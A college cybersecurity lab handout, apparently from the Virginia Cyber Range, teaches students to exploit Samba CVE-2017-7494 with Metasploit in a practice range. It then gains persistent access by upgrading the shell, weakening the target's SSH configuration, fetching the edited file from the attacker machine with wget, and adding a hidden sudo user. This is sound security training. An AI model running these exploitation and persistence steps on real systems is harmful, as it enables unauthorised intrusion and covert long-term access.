Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                

LAB_Exploitation

Download as docx, pdf, or txt
Download as docx, pdf, or txt
You are on page 1of 16

ITN263

Term: Fall 2024

Lesson Exercise 4 – Exploitation


Points Possible: 100

1. Overview

This exercise will demonstrate the use of various Tools, Techniques, and Procedures to complete the exploitation of a
target host based on a known vulnerability. I have highlighted all the commands, be sure to check for spelling or syntax
errors if the command fails. I have also included points in which you should insert screenshots of your output. I will be
using these screenshots for grading.

2. Resources required

This exercise uses the latest Cyber Range: Cyber Basics Environment.

3. Tasks

PART 1: Exploitation
Task 1: Logon to Kali Linux

Start and join the Cyber Basics Environment. If you are asked to log in, use the username: student and password:
student.

Task 2: Examine the details of the vulnerability

After looking at all the data gathered during the Enumeration and Vulnerability Scanning exercises, the best vulnerability
to use for an exploit is the SMB vulnerability CVE-2017-7494.

Examine the details of the Common Vulnerabilities and Exposures (CVE) at the following link:

https://www.cvedetails.com/cve/CVE-2017-7494/?q=CVE-2017-7494

From the left pane of the page, click on (1 Metasploit modules) to find information about the Metasploit Module.

©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
1
ITN263
Term: Fall 2024

The name of the Metasploit module is Samba_is_known_pipename.

Now that we have identified a vulnerability to exploit and know the Metasploit module name, it is time to get serious.

Task 3: Start Metasploit

Metasploit is a penetration testing framework that comes installed in Kali Linux. Metasploit commands are run from the
command line.

First, you need to start Metasploit Framework Console (msfconsole). There are several steps to properly starting the
msfconsole.

First, you need to start the postgresql database service. Metasploit uses this database to store information gathered via
penetration testing activities. You will need to use the sudo command to run this command. The sudo command runs a
command with root-level privileges.

sudo service postgresql start

Second, you must initialize the msf database using the msfdb init command as follows.

sudo msfdb init

Finally, you can start the Metasploit Framework Console by using the msfconsole command as follows:

msfconsole

The msfconsole will start and give you the msf> prompt once the startup has been completed. While you are in the
msfconsole, regular Linux commands will no longer work.

To see a list of available commands from the msf> prompt, type a ? and press enter.

 Insert a screenshot of the ? output:

©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
2
ITN263
Term: Fall 2024

The first command you will use is the search command which will allow you to look for information on the Metasploit
exploit that you will use for this penetration test.

You can search for a CVE number or a Metasploit module name. Use the search command to look for the Metasploit
module that corresponds to the vulnerability we discovered using both the CVE number cve-2017-7494 and the name
is_known_pipename using the following commands from the msf> prompt:

search cve-2017-7494

 Insert a screenshot of the search cve-2017-7494 output:

©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
3
ITN263
Term: Fall 2024

search is_known_pipename

 Insert a screenshot of the search is_known_pipename output:

©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
4
ITN263
Term: Fall 2024

As you can see from the examples above, both methods of search produce the same results. The search command
shows there is an exploit, the location of the exploit, the disclosure date, the rank, and the description of the exploit.
You can now use this information to exploit the target.

Next, you will use the use command to load the exploit as follows:

use exploit/linux/samba/is_known_pipename

When using the use command, you have to use the full path as shown in the name column of the search results as in the
examples above.

The prompt will change to show the name of the exploit that was loaded. Now use the options command to see the
options for the exploit as follows:

options

 Insert a screenshot of the options output:

©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
5
ITN263
Term: Fall 2024

If you look at the options list in the example above, the first option RHOST is blank and is required. RHOST stands for
Remote Host and is the IP address of the target system. Whenever you are attempting to exploit a target system, you
always have to provide an RHOST.

You can use the set command to set the RHOST option using the following command below. The target_ip is the IP
address of the target system identified in previous exercises. The target IP is the host we used in our last enumeration
lab. To find that address open a new terminal window and follow these steps:
route
nmap network_IP/20 (use the network you found with the route command)

Find the host with all the open ports, record IP Address here:

192.168.0.11****

©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
6
ITN263
Term: Fall 2024

Now you can set the rhost using that address.

set rhost target_ip

Once the RHOST option is set, you can then use the exploit command to launch the exploit. If the exploit fails the first
time, check to make sure the target IP address (RHOST) is correct using the options command and run the exploit again.
If the exploit succeeds, you will get Command shell session 1 opened message. This means you have successfully
executed the exploit against the target system.

©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
7
ITN263
Term: Fall 2024

 Insert a screenshot of your output, it will be similar to the image below but with your specific IP
information:

[NOTE: In the sample above, the target IP address is: 10.1.68.250 The IP address of the target host in your network may
be different.]

After the Command shell session 1 opened, you will just have a blinking cursor and no indication that you have entered
a shell on the target system. Use the whoami command to see what account you are logged in to in the shell on the
target system as follows:

whoami

 Insert a screenshot of the whoami output:

You should see that you are the root user. Success!

You can also use the hostname command to see the target system hostname, the pwd command to see the current
directory that you are in on the target system, and the ip addr command to see the IP address of the target system.

The basic shell is a little difficult to work with as it gives you no prompt and no feedback if the command you execute
fails. You can get a more usable shell by using a Python script. Use the following command to create a more useful shell
on the target system:

python -c 'import pty; pty.spawn("/bin/bash")'

©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
8
ITN263
Term: Fall 2024

This command uses the Python programming language to create a new bash shell. Bash is the default shell used in
Linux.

5. References

https://metasploit.help.rapid7.com/docs

PART 2: Post-Exploitation
Task 1: Copy the SSH server configuration from the target system

If you remember back to the enumeration phase, there is an SSH server running on the target system but it requires
cryptographic keys to log on. Since you are now the root user and have a shell on the target system, you can modify the
SSH server configuration so that you can log on with just a username and password. This will allow you to access the
system without having to exploit the vulnerability every time.

Editing the SSH server configuration file via the current shell is possible but difficult. An easier way to modify the SSH
server configuration is to copy the /etc/ssh/sshd_config file to the Kali Linux system, edit the file, and then put it back
on the target system.

On the target system via your msfconsole shell, change to the /etc/ssh/ directory using the cd command as follows:

cd /etc/ssh/

Use the cat command to view the sshd_config file as follows:

cat sshd_config

 Insert a screenshot of the cat output:

On your Kali Linux system, open a new terminal window and create a new directory name sshd in the student home
directory as shown below. This directory will be used to hold the sshd config file that you copy from the target system.
The ~/ in the following command means the home directory of the current user:

©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
9
ITN263
Term: Fall 2024

mkdir ~/sshd

On your Kali Linux system, open a text editor named Mousepad by going to Applications in the top left-hand corner of
the desktop, type Mousepad into the search bar, and select Mousepad from the list of apps.

Copy and paste the sshd_config file from the shell on the target system into the text editor on your Kali Linux system.
Make sure you get the entire file starting with line # $OpenBSD: sshd_config and going to the last line # ForceCommand
cvs server. When copying the text from a terminal window, you have to highlight the text and then select Edit and Copy
from the menu at the top of the terminal window.

©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
10
ITN263
Term: Fall 2024

You can now paste the copied text into the Mousepad application.

Task 2: Edit SSH server configuration on the Kali system

©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
11
ITN263
Term: Fall 2024

Edit the sshd_config file in the Mousepad application to allow password authentication and interactive password
request/response.

Change the line:

PasswordAuthentication no

TO

PasswordAuthentication yes

And change the following line:

ChallengeResponseAuthentication no

TO

ChallengeResponseAuthentication yes

Save the file and name it sshd_config and place it in the sshd folder you just created on your Kali Linux system. When
you select File and Save in the Mousepad application, the default location will be the student home folder. You will
have to select the sshd folder.

On the Kali Linux system in a terminal window, change to the new sshd directory you created as follows:

cd ~/sshd

On the Kali Linux system, use the ls command to verify the sshd_config file is present.

 Insert a screenshot of the ls output:


Task 3: Put the modified SSH server configuration back on the target system

©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
12
ITN263
Term: Fall 2024

Now you have to get the file back to the target system, but you cannot copy and paste it back to the target system.

Luckily there is a way to use Python to put the file back. Python has a script that can start a simple HTTP web server in
any directory on a Linux system. The SimpleHTTPServer script will serve up a webpage and make the files located in the
directory where the server was started accessible via HTTP. You can then download any files located in the directory
where the SimpleHTTPServer is running.

Make sure you are in the sshd directory on your Kali Linux system as follows:

cd ~/sshd

Start the SimpleHTTPServer on port 8000 on your Kali Linux system using the command shown below. Web servers
normally use port 80; however, it is recommended you use a different port to avoid any port conflicts with any other
service that may be running on your Kali Linux system. The -m option tells python to run a module which in this case is
SimpleHTTPServer. Kali Linux has both Python version 2 and version 3 installed. SimpleHTTPServer is a Python2 module,
so we will use that Python version here.

python2 -m SimpleHTTPServer 8000

Test the SimpleHTTPServer with a web browser in Kali Linux by going to http://127.0.0.1:8000. Verify that the
sshd_config file is listed on the webpage. The 127.0.0.1 IP address is the loopback address for your Kali Linux system.

On the target system via your msfconsole shell, change to the /etc/ssh directory as follows:

cd /etc/ssh

On the target system via your msfconsole shell, move the current sshd_config file to sshd_config_old to make way for
the newly edited file. You should always rename files when replacing them so you can revert to the original file by just
©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
13
ITN263
Term: Fall 2024

changing the name back. If you overwrite the file, it will be gone for good. To rename a file in Linux, you use the mv
command which stands for move.

mv sshd_config sshd_config_old

On the target system via your msfconsole shell, use the wget command to get the new sshd_config file from your Kali
Linux system via HTTP. If you do not know the IP address of your Kali Linux system, use the ip addr command to find the
IP address. Be sure to replace kali_linux_ip with the IP address of your Kali Linux system. Wget is a command line HTTP
client that can download files from an HTTP server.

wget kali_linux_ip:8000/sshd_config

 Insert a screenshot of the wget output:

On the target system via your msfconsole shell, use the ls command to verify that the sshd_config file has been
downloaded as follows:

ls sshd_config

 Insert a screenshot of the ls output:

Now that you have the new and improved sshd_config file in place, you need to restart the sshd service on the target
system via your msfconsole shell as follows:

service sshd restart

Now the SSH server on the victim system should allow a username and password.

Task 4: Create a user with sudo access on the target system

The question now is which username and password you should use to log in. You have root-level access but do not
know the root password and do not want to change the root password. Changing the root password may alert system
administrators when the root password no longer works for them.

©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
14
ITN263
Term: Fall 2024

On the target system via your msfconsole shell, use the adduser command as follows to add a new user to the victim
system and set the password using the password command. In the example below, the username is yourname, be sure
to put your actual first name instead of ‘yourname’.

adduser yourname
passwd sekret

 Insert a screenshot of the output:

You will also need to add the new user to the sudo group with the usermod command so the user can execute
commands as root as follows:

usermod -G sudo yourname

On the Kali Linux system in a terminal window, CTRL + C to return to the prompt and use the new account you created
on the target system to SSH into the target system from your Kali system. You will need to use the password you set for
the new user. Be sure to replace target_system_ip with the IP address of your target system.

ssh yourname@target_system_ip

 Insert a screenshot of the ssh output:

On the target system via your SSH shell, test to make sure the sudo access is working for the new account as follows:

cd ~
sudo echo test > testfile
ls testfile

 Insert a screenshot of the ls output:

You should see a file named testfile if your use of sudo was successful.

You are now able to access the target system at will without having to exploit the vulnerability. Even if the vulnerability
is patched, you will have access to the target system with your new user account via SSH.

5. References

https://metasploit.help.rapid7.com/docs
https://www.kali.org/kali-linux-documentation/
https://www.ssh.com/ssh/command/

©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
15
ITN263
Term: Fall 2024

This exercise is designed to use the latest Cyber Range Cyber Basics Environment. All students will have to register for
an account to access the Cyber Range. The instructor will have to create a class and add the Cyber Basics Environment
for the students to be able to use.

The grading for this exercise is based on the output provided by the students. Each student’s environment will be a little
different so there is no master answer key. Students should be encouraged to document their work via a Penetration
Testing Log which they can turn in for grading. The log can be done in any word processing application and should
contain a list of tasks completed, commands run for each task, screenshots of the output from each task, and any issues
encountered during the exercise. The instructor should review the log to ensure that the students are mastering the
appropriate skills.

For this exercise, the students should document all of the steps that they took to gain persistent access to the target
system and any issues they encountered.

©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
16

You might also like